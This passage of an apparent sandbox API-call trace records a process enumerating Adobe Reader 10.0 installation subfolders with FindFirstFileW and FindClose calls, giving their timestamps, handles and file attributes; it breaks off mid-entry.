ftCreationTime.dwLowDateTime=0x80a2abc0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x80a2abc0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x80a2abc0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa00 [0058.352] FindClose (in: hFindFile=0x69aa00 | out: hFindFile=0x69aa00) returned 1 [0058.352] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\RUS\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80a04a60, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x80a04a60, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x80a04a60, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa00 [0058.353] FindClose (in: hFindFile=0x69aa00 | out: hFindFile=0x69aa00) returned 1 [0058.353] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SKY\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80a04a60, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x80a04a60, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x80a04a60, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa00 [0058.354] FindClose (in: hFindFile=0x69aa00 | out: hFindFile=0x69aa00) returned 1 [0058.354] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SLV\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80a04a60, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x80a04a60, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x80a04a60, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa00 [0058.355] FindClose (in: hFindFile=0x69aa00 | out: hFindFile=0x69aa00) returned 1 [0058.355] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SUO\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x805b4280, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x805b4280, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x805b4280, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa00 [0058.355] FindClose (in: hFindFile=0x69aa00 | out: hFindFile=0x69aa00) returned 1 [0058.356] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SVE\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x805da3e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x80600540, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x80600540, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa00 [0058.357] FindClose (in: hFindFile=0x69aa00 | out: hFindFile=0x69aa00) returned 1 [0058.357] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\TUR\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x809de900, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x80a04a60, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x80a04a60, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa00 [0058.358] FindClose (in: hFindFile=0x69aa00 | out: hFindFile=0x69aa00) returned 1 [0058.358] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\UKR\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80861b40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x809de900, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x809de900, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa00 [0058.359] FindClose (in: hFindFile=0x69aa00 | out: hFindFile=0x69aa00) returned 1 [0058.359] FindClose (in: hFindFile=0x69a9c0 | out: hFindFile=0x69a9c0) returned 1 [0058.359] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Javascripts\\*.*", lpFindFileData=0x18ea44 | out: lpFindFileData=0x18ea44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ffe6ce0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7ffe6ce0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7ffe6ce0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69a9c0 [0058.359] FindClose (in: hFindFile=0x69a9c0 | out: hFindFile=0x69a9c0) returned 1 [0058.360] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\*.*", lpFindFileData=0x18ea44 | out: lpFindFileData=0x18ea44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80a50d20, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81efec40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81efec40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69a9c0 [0058.362] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CAT\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81efec40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81efec40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81efec40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa00 [0058.363] FindClose (in: hFindFile=0x69aa00 | out: hFindFile=0x69aa00) returned 1 [0058.364] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CHS\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81df42a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81df42a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81df42a0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa00 [0058.365] FindClose (in: hFindFile=0x69aa00 | out: hFindFile=0x69aa00) returned 1 [0058.365] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CHT\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81df42a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81df42a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81df42a0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa00 [0058.366] FindClose (in: hFindFile=0x69aa00 | out: hFindFile=0x69aa00) returned 1 [0058.366] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CZE\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81cc37a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81ce9900, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81ce9900, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa00 [0058.367] FindClose (in: hFindFile=0x69aa00 | out: hFindFile=0x69aa00) returned 1 [0058.367] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\DAN\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81dce140, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81dce140, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81dce140, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa00 [0058.368] FindClose (in: hFindFile=0x69aa00 | out: hFindFile=0x69aa00) returned 1 [0058.368] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\DEU\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81df42a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81df42a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81df42a0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa00 [0058.369] FindClose (in: hFindFile=0x69aa00 | out: hFindFile=0x69aa00) returned 1 [0058.369] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\ENU\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81da7fe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81dce140, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81dce140, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa00 [0058.370] FindClose (in: hFindFile=0x69aa00 | out: hFindFile=0x69aa00) returned 1 [0058.370] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\ESP\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81da7fe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81da7fe0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81da7fe0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa00 [0058.371] FindClose (in: hFindFile=0x69aa00 | out: hFindFile=0x69aa00) returned 1 [0058.371] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\EUQ\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81efec40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81efec40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81efec40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa00 [0058.371] FindClose (in: hFindFile=0x69aa00 | out: hFindFile=0x69aa00) returned 1 [0058.372] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\FRA\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81da7fe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81da7fe0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81da7fe0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa00 [0058.373] FindClose (in: hFindFile=0x69aa00 | out: hFindFile=0x69aa00) returned 1 [0058.373] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\HRV\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81ce9900, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81ce9900, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81ce9900, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa00 [0058.374] FindClose (in: hFindFile=0x69aa00 | out: hFindFile=0x69aa00) returned 1 [0058.374] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\HUN\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80a76e80, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81cc37a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81cc37a0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa00 [0058.374] FindClose (in: hFindFile=0x69aa00 | out: hFindFile=0x69aa00) returned 1 [0058.375] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\ITA\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81da7fe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81da7fe0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81da7fe0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa00 [0058.376] FindClose (in: hFindFile=0x69aa00 | out: hFindFile=0x69aa00) returned 1 [0058.376] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\JPN\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81dce140, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81dce140, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81dce140, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa00 [0058.377] FindClose (in: hFindFile=0x69aa00 | out: hFindFile=0x69aa00) returned 1 [0058.377] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\KOR\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81d81e80, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81d81e80, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81d81e80, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa00 [0058.378] FindClose (in: hFindFile=0x69aa00 | out: hFindFile=0x69aa00) returned 1 [0058.378] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\NLD\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81dce140, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81dce140, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81dce140, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa00 [0058.380] FindClose (in: hFindFile=0x69aa00 | out: hFindFile=0x69aa00) returned 1 [0058.380] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\NOR\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81da7fe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81da7fe0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81da7fe0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa00 [0058.380] FindClose (in: hFindFile=0x69aa00 | out: hFindFile=0x69aa00) returned 1 [0058.380] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\POL\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80a76e80, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x80a76e80, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x80a76e80, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa00 [0058.381] FindClose (in: hFindFile=0x69aa00 | out: hFindFile=0x69aa00) returned 1 [0058.381] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\PTB\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81d81e80, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81d81e80, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81d81e80, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa00 [0058.382] FindClose (in: hFindFile=0x69aa00 | out: hFindFile=0x69aa00) returned 1 [0058.382] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\RUM\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80a76e80, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x80a76e80, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x80a76e80, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa00 [0058.383] FindClose (in: hFindFile=0x69aa00 | out: hFindFile=0x69aa00) returned 1 [0058.383] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\RUS\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80a50d20, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x80a76e80, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x80a76e80, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa00 [0058.384] FindClose (in: hFindFile=0x69aa00 | out: hFindFile=0x69aa00) returned 1 [0058.384] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SKY\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80a50d20, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x80a50d20, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x80a50d20, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa00 [0058.385] FindClose (in: hFindFile=0x69aa00 | out: hFindFile=0x69aa00) returned 1 [0058.385] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SLV\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80a50d20, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x80a50d20, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x80a50d20, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa00 [0058.385] FindClose (in: hFindFile=0x69aa00 | out: hFindFile=0x69aa00) returned 1 [0058.386] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SUO\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81dce140, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81dce140, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81dce140, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa00 [0058.386] FindClose (in: hFindFile=0x69aa00 | out: hFindFile=0x69aa00) returned 1 [0058.386] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SVE\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81d81e80, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81d81e80, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81d81e80, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa00 [0058.386] FindClose (in: hFindFile=0x69aa00 | out: hFindFile=0x69aa00) returned 1 [0058.386] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\TUR\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80a50d20, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x80a50d20, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x80a50d20, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa00 [0058.387] FindClose (in: hFindFile=0x69aa00 | out: hFindFile=0x69aa00) returned 1 [0058.387] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\UKR\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80a50d20, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x80a50d20, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x80a50d20, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa00 [0058.388] FindClose (in: hFindFile=0x69aa00 | out: hFindFile=0x69aa00) returned 1 [0058.388] FindClose (in: hFindFile=0x69a9c0 | out: hFindFile=0x69a9c0) returned 1 [0058.388] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\*.*", lpFindFileData=0x18ea44 | out: lpFindFileData=0x18ea44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d618a80, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d853f20, 